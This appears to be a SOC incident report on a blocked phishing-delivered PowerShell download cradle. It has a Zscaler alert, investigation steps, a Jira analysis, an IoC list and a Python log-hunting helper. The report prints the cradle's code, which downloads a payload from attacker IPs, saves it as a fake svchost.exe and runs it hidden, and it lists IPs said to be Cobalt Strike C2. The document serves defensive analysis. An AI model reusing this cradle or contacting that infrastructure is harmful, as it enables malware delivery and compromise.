Zscaler Alert Details
Alert ID: ZSCALER-STAGE-CAP-7842
Alert Time: 2024-02-11 09:45:18 EST
Severity: HIGH (78/100)
Source: Zscaler Internet Access (ZIA)
Rule: “Suspicious File Download – Potential Payload Staging”
MITRE ATT&CK: T1608 – Stage Capabilities
Alert Details:
Transaction Details:
– User: jdoe@company.com (John Doe, Marketing)
– Device: MKT-WS-023 (Windows 11)
– Time: 09:42 EST
– Action: BLOCKED (Advanced Threat Protection)
URL: hxxps://cdn.pastebin[.]com/raw/AbCdEfGh
File Name: update_installer.ps1
File Type: PowerShell Script
File Size: 24 KB
Threat Analysis:
– Zscaler Sandbox: MALICIOUS (confidence 92%)
– Threat Name: “PowerShell_Download_Cradle”
– Behavior: Script downloads additional payload from multiple URLs
– URLs Embedded:
– hxxp://185.143.221[.]45/beacon.dll
– hxxps://storage.googleapis.com/company-updates/msupdate.exe (Google Storage abuse)
– hxxp://194.165.16[.]89/loader.bin
Script Analysis Snippet:
  # Candidate staging URLs; the script tries each in turn until one yields the expected payload
  $urls = @(
      "http://185.143.221[.]45/beacon.dll",
      "https://storage.googleapis.com/company-updates/msupdate.exe",
      "http://194.165.16[.]89/loader.bin"
  )
  # Payload is written to %TEMP% under a name masquerading as the legitimate svchost.exe
  $path = "$env:TEMP\svchost.exe"
  foreach ($u in $urls) {
      try {
          Invoke-WebRequest -Uri $u -OutFile $path
          # Hash check ensures only the intended payload runs; a mismatch falls through to the next URL
          if ((Get-FileHash $path).Hash -eq "a1b2c3d4e5f6…") {
              Start-Process $path -WindowStyle Hidden
              break
          }
      } catch {}   # download errors are silently swallowed
  }
Additional Context:
– User accessed pastebin.com via corporate network
– Domain pastebin.com categorized as “Information Technology” (allowed)
– Specific raw URL not previously known; first request
– Download blocked before reaching endpoint
SOC Investigation Process
1. Alert Validation
   – Action: Verify Zscaler sandbox analysis
   – Tools Used: Zscaler Admin Console
   – Findings: Confirmed malicious PowerShell download cradle
2. Endpoint Check
   – Action: Verify if any part of script executed
   – Tools Used: CrowdStrike Falcon
   – Findings: No evidence of execution; block was successful
3. User Interview
   – Action: Contact user about pastebin access
   – Tools Used: Teams, Phone
   – Findings: User clicked link in phishing email; reported suspicious email
4. Email Investigation
   – Action: Find source of link
   – Tools Used: Proofpoint, M365 Defender
   – Findings: Email from “security@update-company[.]net” with link
5. Infrastructure Blocking
   – Action: Block all associated IOCs
   – Tools Used: Zscaler, Palo Alto, Cisco Umbrella
   – Findings: Added URLs/IPs to blocklists
6. Threat Hunting
   – Action: Search for similar download attempts
   – Tools Used: Splunk, Zscaler Logs
   – Findings: No other users accessed same URL
Jira Incident Report
Ticket: SOC-2024-056
Summary: T1608 – PowerShell Download Cradle Blocked During Staging Phase
Status: RESOLVED
Resolution: MALICIOUS – Payload Blocked
Priority: P2 – MEDIUM
Labels: T1608, stage-capabilities, powershell, download-cradle, zscaler
Components: Web-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA) Advanced Threat Protection.
Alert: “Suspicious File Download – Potential Payload Staging”.
User: jdoe@company.com (Marketing Department).
Time: 2024-02-11 09:45 EST.
Technique: MITRE ATT&CK T1608 – Stage Capabilities.
2. Technical Analysis:
Staging Activity:
URL: hxxps://cdn.pastebin[.]com/raw/AbCdEfGh
File: update_installer.ps1 (PowerShell download cradle)
Action: BLOCKED by Zscaler before reaching endpoint
User Action: Clicked link in phishing email
Payload Details:
Script designed to download and execute additional malware
Embedded URLs:
hxxp://185.143.221[.]45/beacon.dll (Cobalt Strike)
hxxps://storage.googleapis.com/company-updates/msupdate.exe (Google Storage abused)
hxxp://194.165.16[.]89/loader.bin (Unknown loader)
Hash validation to ensure correct payload
Executes from temp folder masquerading as svchost.exe
Infrastructure Analysis:
IP 185.143.221[.]45: Bulgaria VPS, known for Cobalt Strike C2
IP 194.165.16[.]89: Romania VPS, associated with TA577
Google Storage bucket: storage.googleapis.com/company-updates/ (abused)
Email Source:
Phishing email from security@update-company[.]net
Subject: “Critical Security Update Required”
Link to pastebin URL
Email quarantined by Proofpoint after user reported
3. Investigation Findings:
Timeline:
09:40 – User receives phishing email
09:41 – User clicks link to pastebin
09:42 – Zscaler blocks PowerShell script download
09:45 – Zscaler alert generated
09:47 – SOC begins investigation
09:50 – User interviewed; confirms suspicious email
09:55 – Email quarantined; IOCs blocked
Indicators of Compromise (IoCs):
URLs:
– hxxps://cdn.pastebin[.]com/raw/AbCdEfGh
– hxxp://185.143.221[.]45/beacon.dll
– hxxps://storage.googleapis.com/company-updates/msupdate.exe
– hxxp://194.165.16[.]89/loader.bin
IPs:
– 185.143.221[.]45
– 194.165.16[.]89
Email:
– sender: security@update-company[.]net
– subject: “Critical Security Update Required”
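An added hunting helper (example code, not part of the original report and not a Zscaler or Splunk feature) that applies the IoCs above and the raw-paste-download pattern behind the tightened Zscaler policy to proxy log lines; the key=value log layout and the sample lines are constructed assumptions, not the real Zscaler feed format.

```python
import re
from urllib.parse import urlparse
# IoCs as listed in the report (defanged); refang() restores them for matching against log fields.
IOC_URLS_DEFANGED = [
    "hxxps://cdn.pastebin[.]com/raw/AbCdEfGh",
    "hxxp://185.143.221[.]45/beacon.dll",
    "hxxps://storage.googleapis.com/company-updates/msupdate.exe",
    "hxxp://194.165.16[.]89/loader.bin",
]
IOC_IPS_DEFANGED = ["185.143.221[.]45", "194.165.16[.]89"]

# Constructed sample proxy log lines in a simplified key=value layout (an assumption, not the real Zscaler feed format).
SAMPLE_LOGS = [
    'time="2024-02-11 09:42:00" user=jdoe@company.com url="https://cdn.pastebin.com/raw/AbCdEfGh" action=blocked',
    'time="2024-02-11 09:50:12" user=asmith@company.com url="https://cdn.pastebin.com/raw/ZzYyXxWw" action=allowed',
    'time="2024-02-11 10:03:44" user=bwong@company.com url="http://185.143.221.45/beacon.dll" action=allowed',
    'time="2024-02-11 10:10:05" user=clee@company.com url="https://pastebin.com/" action=allowed',
]

def refang(s: str) -> str:
    """Turn defanged notation (hxxp, [.]) back into a literal URL or IP."""
    return re.sub(r"^hxxp", "http", s).replace("[.]", ".")
IOC_URLS = {refang(u) for u in IOC_URLS_DEFANGED}
IOC_IPS = {refang(ip) for ip in IOC_IPS_DEFANGED}
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_log_line(line: str) -> dict:
    """Split key=value fields, honouring double-quoted values."""
    return {key: quoted or bare for key, quoted, bare in _KV.findall(line)}

def hunt(lines):
    """One finding per line whose URL is a known IoC, an IoC IP, or a raw-paste download."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        url = rec.get("url", "")
        parsed = urlparse(url)
        host = parsed.hostname or ""
        reasons = []
        if url in IOC_URLS:
            reasons.append("known IoC URL")
        if host in IOC_IPS:
            reasons.append("known IoC IP")
        # pastebin.com and its subdomains only; a plain endswith("pastebin.com") would also match look-alikes.
        if (host == "pastebin.com" or host.endswith(".pastebin.com")) and parsed.path.startswith("/raw/"):
            reasons.append("raw paste download")
        if reasons:
            findings.append({"user": rec.get("user"), "url": url, "action": rec.get("action"), "reasons": reasons})
    return findings
```

Each finding keeps the proxy action, so an "allowed" hit on the second raw-paste line is exactly the kind of result the threat hunting step was looking for.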
4. Containment Actions:
Immediate Actions:
All IOCs added to Zscaler, Palo Alto, and Cisco Umbrella blocklists.
Email quarantined and purged from all mailboxes.
User’s workstation scanned (no compromise).
User Education:
User commended for reporting suspicious email.
Reinforced training on link verification.
5. Root Cause Analysis:
Primary Cause: Phishing email luring user to download staged payload.
Contributing Factors: pastebin.com was categorized as “Information Technology” and therefore allowed; user clicked the link.
6. Business Impact: None – payload blocked before execution.
7. Remediation & Prevention:
Completed Actions:
IOCs blocked.
User educated.
Enhanced Zscaler policy to block pastebin raw URLs.
8. Conclusion:
Attackers staged a PowerShell download cradle on pastebin and attempted to lure a user via phishing. Zscaler blocked the download, preventing payload retrieval. No compromise occurred.
Closure Rationale: Payload blocked; user safe; IOCs added to blocklists.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-11 10:30 EST